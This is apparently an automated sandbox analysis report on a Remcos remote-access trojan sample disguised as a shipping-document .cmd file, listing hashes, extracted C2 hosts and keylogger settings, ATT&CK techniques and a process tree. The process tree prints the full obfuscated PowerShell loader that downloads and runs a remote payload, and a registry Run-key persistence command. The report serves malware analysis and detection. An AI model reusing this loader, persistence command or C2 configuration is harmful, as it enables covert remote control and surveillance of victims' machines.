remcos | caa4eddbc202ba6e4978e3c2c5991b886e675c91006148aa45e5ffba0605b155

General

Target

awb_shipping_documents_bl_inv_2024_12_04_000000000000000.cmd
Size

7KB
MD5

12ee31039816c33d31fb9dad778fe576
SHA1

c1959d46a3384851398249cef3e27e5d0296f884
SHA256

b1b8e1093c838012c779d0f80fff877ef269072b8807d53906e0c0aef343f9e4
SHA512

95780e880506d8974ca70a683bd941c0c7d783d02b319760a7cd692c4526da9e82f5f21fa86d183d316dec4acef9c9a9c15f73695b9072774631d62ce5e1ddb8
SSDEEP

96:zSqPH/nDhhlCkBx+/h8l4GwKga/BKvv1XrxKEXv5+SqapBF/H1n9pas:DHrhhlTv+p8l4GoYM31NKEXwapV90s

Score

10^/10

remcos new discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

New

C2

janout21oadsts1.duckdns.org:57484

janout21oadsts1.duckdns.org:57483

janout21oadsts2.duckdns.org:57484

janout21oadsts3.duckdns.org:57484

janout21oadsts4.duckdns.org:57484

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
amaonspt.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
lmoijuetgtso-X0FCJD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	2848	powershell.exe
7	2436	msiexec.exe
9	2436	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2848	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fatbirds = "%Fremskridtspartier% -windowstyle 1 $Cognacsfarvede=(gp -Path 'HKCU:\\Software\\Sacerdotism\\').Floristics;%Fremskridtspartier% ($Cognacsfarvede)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2436	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2560	powershell.exe
2436	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2148	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2924	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2848	powershell.exe
2560	powershell.exe
2560	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2560	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 2848	2148	cmd.exe	32
PID 2148 wrote to memory of 2848	2148	cmd.exe	32
PID 2148 wrote to memory of 2848	2148	cmd.exe	32
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2560 wrote to memory of 2436	2560	powershell.exe	37
PID 2436 wrote to memory of 2524	2436	msiexec.exe	38
PID 2436 wrote to memory of 2524	2436	msiexec.exe	38
PID 2436 wrote to memory of 2524	2436	msiexec.exe	38
PID 2436 wrote to memory of 2524	2436	msiexec.exe	38
PID 2524 wrote to memory of 2924	2524	cmd.exe	40
PID 2524 wrote to memory of 2924	2524	cmd.exe	40
PID 2524 wrote to memory of 2924	2524	cmd.exe	40
PID 2524 wrote to memory of 2924	2524	cmd.exe	40

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_bl_inv_2024_12_04_000000000000000.cmd"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden ";$Biographizes='Spejlglatte';;$Rygstd165='Decorums';;$Kommandrernes='Eerock';;$Omfavnelses='Mole';;$agueweed=$host.Name;function Understtning($Polycrase){If ($agueweed) {$Inconsumptiblennerves=5} for ($Inconsumptible=$Inconsumptiblennerves;;$Inconsumptible+=6){if(!$Polycrase[$Inconsumptible]) { break };$Helsiderne+=$Polycrase[$Inconsumptible];$Prangerne='Svide'}$Helsiderne}function Unplagiarizeds($Disparish){ .($Indtjeningsmuligheds124) ($Disparish)}$Gnotobiosis=Understtning 'NominNAfsmeE atatTrill.Frndew';$Gnotobiosis+=Understtning 'dagceeSkrumBLeverCvand.LNyamwi SukkEUdsmin Retrt';$Hundeslaede=Understtning 'Afka MTen roEphemzOpprei ,irelFo,tulAd,inatilka/';$Ageustia=Understtning ' ThewTPostelChordsRufic1 msae2';$hucksterage='Accre[To kiNT keseBrandtRo,in.BejdsS ntameTriarrSa gbVMar tI chalCArbeje rsnipmassiObund i ,fprn GugltBlaffMHa.gkAdozenn,olluaMom,ng NeurEUnforR Sola]P,ary: J rd:bnne,sFabr eJeffyC Be,tUApokarEssayISkramtCykliyTriolpWhiter Sa lOForaaTFisseoVord.CPi toOAd.atl Snoo= Bnde$MillsAeleveG DeaiE UnsuuKvotaSUnhoaTIntaiI ndera';$Hundeslaede+=Understtning 'Brums5Skk p. Meta0Jasig kh ka( Poe WEl.koiPrel,nStepldUnd,roEngrawOplags Spt, BondeNdybd TReduk Hexaf1 Udpo0S eci.Tallb0Ka.in;D.bva Em ssWSkydei C aznBaske6Hadi 4Sa mo;Frees Pren xBrod.6Cal s4Dann ;Helhe UnderrSubi,vEle a:water1 ar.h3Epic 1Isorc.Super0livsa) Spik Fa foGO ermeOdalvcPraenkFan.lo Omst/Ku,st2Uto,i0frste1hercy0Pho.o0Hulsx1Komma0Inter1Avi p SpindFGarbliS iberStopkeT mpofTrebuo kildxKultu/Strst1 Misz3 Sn,r1 onco.Grisk0';$Undiscomfitable152=Understtning ' Blaau UninS Vin,EPiasar aplo-RiotraPolypGFolkeE InteNSofaeT';$Amtsskattekredses=Understtning 'ZulinhChihutTakletRemonpMisf.s vej.:Slagg/Jaspa/ EleukIdyllrEnravt watsoStavepOpspuuF rsvp ntik. Eft,cTegnio TetamBade,/RingeGSuperrr.ndtidam rp pidepTorriiVelo nBr neeKot lsValgnslae e..echnp urbsRumvgpReder> NonshVandbtNup etPanoipY elssCentr:Birre/.reds/Montak Affrr abuntTr gso,ummipchestuBillepDissos Cavi.GenercAnd no,elevmgraat/KiropG Rbdir Pat,iAflevpSarcopDaekoiF lesnApocoeDagbdslivresImmis.GestipGor osJettyp';$Ligestillingsraadets=Understtning ' Plod>';$Indtjeningsmuligheds124=Understtning 'UreteiSupplES llaX';$Sankningerne='Ornaterne';$Tilgivnes183='\Nonpolemic.Fod';Unplagiarizeds (Understtning ',nthr$,atalGHungaLSymptOInkasb Tt,eaT,anslSos e:CafslbS nteUHumbuNHusv,DSrgmoSUberrKRectoR EntoA Duk b RisoePropon atteERattlSInart=Overs$Lyk seUnretn ressV yph:FulahA IagtPBalefPAbortDudbula SubqT I,clAKlamm+Prock$ c okTRorkai F,mtl Unmugun uci MergvHoecaNSkridENonobsIntro1ulydi8Rephr3');Unplagiarizeds (Understtning 'Raffi$Cent GSpillLPr gnOTo.msbra.ulANexusLSyna : S.orSSv,niTRokkeoAplotrKorruhAffareOver,dDukedsDupliTLaursI ParvdTipolE IncoR Aand=Vaabe$Protoa hylMVildhTLindoSOp ens KundKP chyA Disct BaraTAg,vee.asmiKunparrKigh e nedsdSolb.sPaastE B spsWinke. .adeSPeltaPStd mlInermIPhytoTJv st(T.ene$ Tr vLScaleIKroopGsurmleMrk nS,omomT iltoISurmuLHaandlPrefaiRetronBacheG HypasDataoR,asseA TeamA wennd reerEKlapst WhimSInter)');Unplagiarizeds (Understtning $hucksterage);$Amtsskattekredses=$Storhedstider[0];$Femineity=(Understtning 'Tungt$ PilegTax dl,vlerOTrediBOutguAKon iLen.ta:FormaLSquarAJemedtEpicaISdeliN Ko.m= Exesn Ver eunlumw,odul-Stro O nconbP cryjProleeUd,usC FlngT Mund Sp.edsSponsysyrniSS rygtJazzmERosabM efol. Attr$ orgGCandlNVandfOStru tPerioODistrB.ypriIConduO Non sLiliaiUdturs');Unplagiarizeds ($Femineity);Unplagiarizeds (Understtning ' Galv$RegovLLonelaTorcht ecoliGladsnBl tz.Vu tuHfumleePaseaaasca dDrap.eIndkarFlashs Tran[Forsg$ lusUChivynSynerdIsotai PopjsVendecUnsnao OmstmStratfCamisiCitizt TektaHug rbSuperlA tioe Flow1Konci5P cot2Amela]Uanbr=Alida$ ntikHoy teuLo usn Ho sd agfoeIo.ossIncl.lBesgsaCorroeIndivdD tace');$die=Understtning ' Br,c$InharLOverfaElekttNaschiHegn nExist.MenetDReimboThomsw A tenBarselErotioUgun,a pnsedUdb.dFDrifti Drspl Ankoe Imbr(Whe r$InterASyn.amMeso t Ov,rsA semsSoundkUdk naJentjtCatcatWeasoeThylakSk.ftrU vireP ogrd Privs Garme trudsCatst, nter$ UnipVFi stdPaastdKapeleF.ydel Sophb El osSktte)';$Vddelbs=$Bundskrabenes;Unplagiarizeds (Understtning 'Mei,e$ StdnG CelllVaskeOBerinB rosta Sa,llHun r:RishtP isoseD,ssilSarkaE Ar eCAr,hwaLejernFed,di asonFFrednOEconorStatsmapagoEGudbesUnsta=Craw (,teretPapereC ocaS M gatBilld-CyberpKvindAPlumbTHeis.hItene hort$Unimpvfrdi D HolddobturEDemorL Hydrb Longs Mude)');while (!$Pelecaniformes) {Unplagiarizeds (Understtning 'Ba.ca$SygdogBefral AmpuoLobcobToksiaBaskelKlini: SmldPVand r evie SalicForstoPlatinBalanfUnfiliSkuesd Ca,heIr.epd Ini =Out l$AabniIconstnPres c NgteoFodbanMarlasI,limuDeviomVed,ipHoristPushei P eabRelatlVekseeBagtan.sychdTiltaeCyprin Uns tClubhi p atnHje,tg') ;Unplagiarizeds $die;Unplagiarizeds (Understtning ' ribSTemattprograLynkrR dvicTSkvul-Toe.lsDrukmLJingoeRegioE,uckeP kako Stig.4');Unplagiarizeds (Understtning 'Bedve$ eglGD.blelDest O Sa ab UforA nderlAliso:ProtepPriviE emisLKanneEIncomC OxycaS lviNBeg niDegneFRi eloS,ejsR HurtMKiblaeRad.as Bi l=Flask(LadleTTramaEStephsGambrtFratr- KabepRdgraaMixhiTBar.aHReit S art$ RegevLaminDtalesD.ecroeFor tlslithbRigm SFling)') ;Unplagiarizeds (Understtning 'aerat$CorotgFe.tilP,mpeoUnbrubpulsaa tot,lSkmte:SymboALame FBlousPFang r ValgoHvalbeScholv Oppin AtomEHenvi=Ten a$Spo.tgIndrelTek ioAllegbOsm.naUigenLBattl:Staalt tum iVaabetInv tRD emtELedsaRReco I StjenoperagGambiEMal,irSn bbnAchteEFo brSStart+Exe,c+Besvi% Soot$Gausss.agsbtGrounOAmmunRTriplhAdvokeFragtDC intsFosteTAlby.IDb foD TerreOutmarEssig.,entoC Br do Am.rUkicksn Se ht') ;$Amtsskattekredses=$Storhedstider[$Afproevne]}$Rackworks=291737;$Virakkens=31497;Unplagiarizeds (Understtning ' esej$PostdgK.merl mfanOHeptabMartiaCo stl U is:Fo,udbStip.lS,atioNon,lW.angssR pagiMillrl ReluyDelkr Vande=topli BecloGReacce.roldtHoumo-S bmic.ejouOFunktNantictSkoleESkrumNScr wtSinic Pa ay$ Ja uvFerieDEmmardFjerdeLecheL equaBFo sis');Unplagiarizeds (Understtning ' Djvl$.terngTrg gl BilloForrabY relaOver lKarak: Fj rH,pumoe Afprl lacku alorlSlu.vdU.godeOpfarn Unapt Peri Sirs=Retep Skrof[SwayeSBecuryKomposBifentExclae BadsmRealk.CognaCSvmmeoT.ompn NervvEkspoeLauterD skotRedo.] di,k:Zamou:ReinvFPhotor SprioDi,tomTricoBSeagiaHvebosPapire Udvi6Affal4Opna.SKraket Vermr Tilri Hudan BevigBagia( A ds$Aria.BS rymlKlemboTidlgwHeliasFiligiDi kelvi.key,poon)');Unplagiarizeds (Understtning ' Skjo$CountGAfd.lLNyordoMinj,ByatalAAminoL desi:co egBAftenI outhL J,rdbGan,loArchaASengesNom n Penta= Rhap Serg[DiatoSinstrY Jo,gsSv ndTPro.lEmeaniMTriad. H.emT Prn,EfortrXM,ereTUddat.NeuroE iliNBe.nnc GeocoVagtedServiISero,nFyrreG peck]Unpr :G atu:S gtsabachesHem,ac,ebutISubcoi snus. SupeGQuateE Br dTd hydSSku.ptPaleorStridi GalinFolkeg ushe(Imp o$FlleshSindieRottelforuruDecalLoperadVildfED erenFrumetVerdu)');Unplagiarizeds (Understtning ' ieti$Ov rtG pooLGrovfOSadd.BBipheA ntemLUde l:inte.DExs lrarbejaErythG ruskOpro uNOligoTDehumaViddeiContalTrina=Op.ak$ScuddbSu.phICamailPrealB InteO ,ydraDisthS Embr.Ant ss ,eliuTudetBNyrelSSkil.T Vegerrespoi HentNIsoscGgoose( omle$FusioRAtomfaQuippCFel nkIonbiwHe frOHal lrDragokVagtsSSevil,Udvik$StallVCyni.I,ugesrMes nAgeomoKA svaKAn uaEdunjaNSkuddsFrist)');Unplagiarizeds $Dragontail;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Biographizes='Spejlglatte';;$Rygstd165='Decorums';;$Kommandrernes='Eerock';;$Omfavnelses='Mole';;$agueweed=$host.Name;function Understtning($Polycrase){If ($agueweed) {$Inconsumptiblennerves=5} for ($Inconsumptible=$Inconsumptiblennerves;;$Inconsumptible+=6){if(!$Polycrase[$Inconsumptible]) { break };$Helsiderne+=$Polycrase[$Inconsumptible];$Prangerne='Svide'}$Helsiderne}function Unplagiarizeds($Disparish){ .($Indtjeningsmuligheds124) ($Disparish)}$Gnotobiosis=Understtning 'NominNAfsmeE atatTrill.Frndew';$Gnotobiosis+=Understtning 'dagceeSkrumBLeverCvand.LNyamwi SukkEUdsmin Retrt';$Hundeslaede=Understtning 'Afka MTen roEphemzOpprei ,irelFo,tulAd,inatilka/';$Ageustia=Understtning ' ThewTPostelChordsRufic1 msae2';$hucksterage='Accre[To kiNT keseBrandtRo,in.BejdsS ntameTriarrSa gbVMar tI chalCArbeje rsnipmassiObund i ,fprn GugltBlaffMHa.gkAdozenn,olluaMom,ng NeurEUnforR Sola]P,ary: J rd:bnne,sFabr eJeffyC Be,tUApokarEssayISkramtCykliyTriolpWhiter Sa lOForaaTFisseoVord.CPi toOAd.atl Snoo= Bnde$MillsAeleveG DeaiE UnsuuKvotaSUnhoaTIntaiI ndera';$Hundeslaede+=Understtning 'Brums5Skk p. Meta0Jasig kh ka( Poe WEl.koiPrel,nStepldUnd,roEngrawOplags Spt, BondeNdybd TReduk Hexaf1 Udpo0S eci.Tallb0Ka.in;D.bva Em ssWSkydei C aznBaske6Hadi 4Sa mo;Frees Pren xBrod.6Cal s4Dann ;Helhe UnderrSubi,vEle a:water1 ar.h3Epic 1Isorc.Super0livsa) Spik Fa foGO ermeOdalvcPraenkFan.lo Omst/Ku,st2Uto,i0frste1hercy0Pho.o0Hulsx1Komma0Inter1Avi p SpindFGarbliS iberStopkeT mpofTrebuo kildxKultu/Strst1 Misz3 Sn,r1 onco.Grisk0';$Undiscomfitable152=Understtning ' Blaau UninS Vin,EPiasar aplo-RiotraPolypGFolkeE InteNSofaeT';$Amtsskattekredses=Understtning 'ZulinhChihutTakletRemonpMisf.s vej.:Slagg/Jaspa/ EleukIdyllrEnravt watsoStavepOpspuuF rsvp ntik. Eft,cTegnio TetamBade,/RingeGSuperrr.ndtidam rp pidepTorriiVelo nBr neeKot lsValgnslae e..echnp urbsRumvgpReder> NonshVandbtNup etPanoipY elssCentr:Birre/.reds/Montak Affrr abuntTr gso,ummipchestuBillepDissos Cavi.GenercAnd no,elevmgraat/KiropG Rbdir Pat,iAflevpSarcopDaekoiF lesnApocoeDagbdslivresImmis.GestipGor osJettyp';$Ligestillingsraadets=Understtning ' Plod>';$Indtjeningsmuligheds124=Understtning 'UreteiSupplES llaX';$Sankningerne='Ornaterne';$Tilgivnes183='\Nonpolemic.Fod';Unplagiarizeds (Understtning ',nthr$,atalGHungaLSymptOInkasb Tt,eaT,anslSos e:CafslbS nteUHumbuNHusv,DSrgmoSUberrKRectoR EntoA Duk b RisoePropon atteERattlSInart=Overs$Lyk seUnretn ressV yph:FulahA IagtPBalefPAbortDudbula SubqT I,clAKlamm+Prock$ c okTRorkai F,mtl Unmugun uci MergvHoecaNSkridENonobsIntro1ulydi8Rephr3');Unplagiarizeds (Understtning 'Raffi$Cent GSpillLPr gnOTo.msbra.ulANexusLSyna : S.orSSv,niTRokkeoAplotrKorruhAffareOver,dDukedsDupliTLaursI ParvdTipolE IncoR Aand=Vaabe$Protoa hylMVildhTLindoSOp ens KundKP chyA Disct BaraTAg,vee.asmiKunparrKigh e nedsdSolb.sPaastE B spsWinke. .adeSPeltaPStd mlInermIPhytoTJv st(T.ene$ Tr vLScaleIKroopGsurmleMrk nS,omomT iltoISurmuLHaandlPrefaiRetronBacheG HypasDataoR,asseA TeamA wennd reerEKlapst WhimSInter)');Unplagiarizeds (Understtning $hucksterage);$Amtsskattekredses=$Storhedstider[0];$Femineity=(Understtning 'Tungt$ PilegTax dl,vlerOTrediBOutguAKon iLen.ta:FormaLSquarAJemedtEpicaISdeliN Ko.m= Exesn Ver eunlumw,odul-Stro O nconbP cryjProleeUd,usC FlngT Mund Sp.edsSponsysyrniSS rygtJazzmERosabM efol. Attr$ orgGCandlNVandfOStru tPerioODistrB.ypriIConduO Non sLiliaiUdturs');Unplagiarizeds ($Femineity);Unplagiarizeds (Understtning ' Galv$RegovLLonelaTorcht ecoliGladsnBl tz.Vu tuHfumleePaseaaasca dDrap.eIndkarFlashs Tran[Forsg$ lusUChivynSynerdIsotai PopjsVendecUnsnao OmstmStratfCamisiCitizt TektaHug rbSuperlA tioe Flow1Konci5P cot2Amela]Uanbr=Alida$ ntikHoy teuLo usn Ho sd agfoeIo.ossIncl.lBesgsaCorroeIndivdD tace');$die=Understtning ' Br,c$InharLOverfaElekttNaschiHegn nExist.MenetDReimboThomsw A tenBarselErotioUgun,a pnsedUdb.dFDrifti Drspl Ankoe Imbr(Whe r$InterASyn.amMeso t Ov,rsA semsSoundkUdk naJentjtCatcatWeasoeThylakSk.ftrU vireP ogrd Privs Garme trudsCatst, nter$ UnipVFi stdPaastdKapeleF.ydel Sophb El osSktte)';$Vddelbs=$Bundskrabenes;Unplagiarizeds (Understtning 'Mei,e$ StdnG CelllVaskeOBerinB rosta Sa,llHun r:RishtP isoseD,ssilSarkaE Ar eCAr,hwaLejernFed,di asonFFrednOEconorStatsmapagoEGudbesUnsta=Craw (,teretPapereC ocaS M gatBilld-CyberpKvindAPlumbTHeis.hItene hort$Unimpvfrdi D HolddobturEDemorL Hydrb Longs Mude)');while (!$Pelecaniformes) {Unplagiarizeds (Understtning 'Ba.ca$SygdogBefral AmpuoLobcobToksiaBaskelKlini: SmldPVand r evie SalicForstoPlatinBalanfUnfiliSkuesd Ca,heIr.epd Ini =Out l$AabniIconstnPres c NgteoFodbanMarlasI,limuDeviomVed,ipHoristPushei P eabRelatlVekseeBagtan.sychdTiltaeCyprin Uns tClubhi p atnHje,tg') ;Unplagiarizeds $die;Unplagiarizeds (Understtning ' ribSTemattprograLynkrR dvicTSkvul-Toe.lsDrukmLJingoeRegioE,uckeP kako Stig.4');Unplagiarizeds (Understtning 'Bedve$ eglGD.blelDest O Sa ab UforA nderlAliso:ProtepPriviE emisLKanneEIncomC OxycaS lviNBeg niDegneFRi eloS,ejsR HurtMKiblaeRad.as Bi l=Flask(LadleTTramaEStephsGambrtFratr- KabepRdgraaMixhiTBar.aHReit S art$ RegevLaminDtalesD.ecroeFor tlslithbRigm SFling)') ;Unplagiarizeds (Understtning 'aerat$CorotgFe.tilP,mpeoUnbrubpulsaa tot,lSkmte:SymboALame FBlousPFang r ValgoHvalbeScholv Oppin AtomEHenvi=Ten a$Spo.tgIndrelTek ioAllegbOsm.naUigenLBattl:Staalt tum iVaabetInv tRD emtELedsaRReco I StjenoperagGambiEMal,irSn bbnAchteEFo brSStart+Exe,c+Besvi% Soot$Gausss.agsbtGrounOAmmunRTriplhAdvokeFragtDC intsFosteTAlby.IDb foD TerreOutmarEssig.,entoC Br do Am.rUkicksn Se ht') ;$Amtsskattekredses=$Storhedstider[$Afproevne]}$Rackworks=291737;$Virakkens=31497;Unplagiarizeds (Understtning ' esej$PostdgK.merl mfanOHeptabMartiaCo stl U is:Fo,udbStip.lS,atioNon,lW.angssR pagiMillrl ReluyDelkr Vande=topli BecloGReacce.roldtHoumo-S bmic.ejouOFunktNantictSkoleESkrumNScr wtSinic Pa ay$ Ja uvFerieDEmmardFjerdeLecheL equaBFo sis');Unplagiarizeds (Understtning ' Djvl$.terngTrg gl BilloForrabY relaOver lKarak: Fj rH,pumoe Afprl lacku alorlSlu.vdU.godeOpfarn Unapt Peri Sirs=Retep Skrof[SwayeSBecuryKomposBifentExclae BadsmRealk.CognaCSvmmeoT.ompn NervvEkspoeLauterD skotRedo.] di,k:Zamou:ReinvFPhotor SprioDi,tomTricoBSeagiaHvebosPapire Udvi6Affal4Opna.SKraket Vermr Tilri Hudan BevigBagia( A ds$Aria.BS rymlKlemboTidlgwHeliasFiligiDi kelvi.key,poon)');Unplagiarizeds (Understtning ' Skjo$CountGAfd.lLNyordoMinj,ByatalAAminoL desi:co egBAftenI outhL J,rdbGan,loArchaASengesNom n Penta= Rhap Serg[DiatoSinstrY Jo,gsSv ndTPro.lEmeaniMTriad. H.emT Prn,EfortrXM,ereTUddat.NeuroE iliNBe.nnc GeocoVagtedServiISero,nFyrreG peck]Unpr :G atu:S gtsabachesHem,ac,ebutISubcoi snus. SupeGQuateE Br dTd hydSSku.ptPaleorStridi GalinFolkeg ushe(Imp o$FlleshSindieRottelforuruDecalLoperadVildfED erenFrumetVerdu)');Unplagiarizeds (Understtning ' ieti$Ov rtG pooLGrovfOSadd.BBipheA ntemLUde l:inte.DExs lrarbejaErythG ruskOpro uNOligoTDehumaViddeiContalTrina=Op.ak$ScuddbSu.phICamailPrealB InteO ,ydraDisthS Embr.Ant ss ,eliuTudetBNyrelSSkil.T Vegerrespoi HentNIsoscGgoose( omle$FusioRAtomfaQuippCFel nkIonbiwHe frOHal lrDragokVagtsSSevil,Udvik$StallVCyni.I,ugesrMes nAgeomoKA svaKAn uaEdunjaNSkuddsFrist)');Unplagiarizeds $Dragontail;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fatbirds" /t REG_EXPAND_SZ /d "%Fremskridtspartier% -windowstyle 1 $Cognacsfarvede=(gp -Path 'HKCU:\Software\Sacerdotism\').Floristics;%Fremskridtspartier% ($Cognacsfarvede)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fatbirds" /t REG_EXPAND_SZ /d "%Fremskridtspartier% -windowstyle 1 $Cognacsfarvede=(gp -Path 'HKCU:\Software\Sacerdotism\').Floristics;%Fremskridtspartier% ($Cognacsfarvede)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SW6AGXXT7AKDP1P2JRZO.temp

Filesize
7KB

MD5
9b017b79ef9fe85bd8dfc5cc44a71ab3

SHA1
0487485c253d73e7a7c4b3836a5c06ffff080a3b

SHA256
694a6f41890f5c56a691d4bbdec45ff1465e4c86300bca3c406a81d036f588a7

SHA512
13ddf14d07cbfcc249b540c8e44fadfa85f226363d3be0a586649af8d0cf89df0ef9ba7bcdfa7d603777cc2dacff9f99e0270dc233e1a1ed11b76a41081ed526

Download Submit
C:\Users\Admin\AppData\Roaming\Nonpolemic.Fod

Filesize
420KB

MD5
063871f6939ea316b5ae7521481695d5

SHA1
99a5e20f0043d1615f6ac93906d0a39594459d44

SHA256
0287e48d0c5199a6b426be2ac7f1ee87be65e61138b6cf6434ce604740d044d9

SHA512
9ed360ecdbc85566a52c03f89992859ee3521068f4557ac3506c497a4df90916f6ac9c0c442d6b798a8c148f7c5f86c189ece32d76ff1001c21d2218d9290ba8

Download Submit
memory/2436-37-0x0000000000C20000-0x0000000001C82000-memory.dmp

Filesize
16.4MB

Download
memory/2560-18-0x00000000065B0000-0x0000000007FDE000-memory.dmp

Filesize
26.2MB

Download
memory/2848-7-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2848-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2848-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2848-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2848-14-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2848-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2848-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2848-6-0x0000000002080000-0x0000000002088000-memory.dmp

Filesize
32KB

Download
memory/2848-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads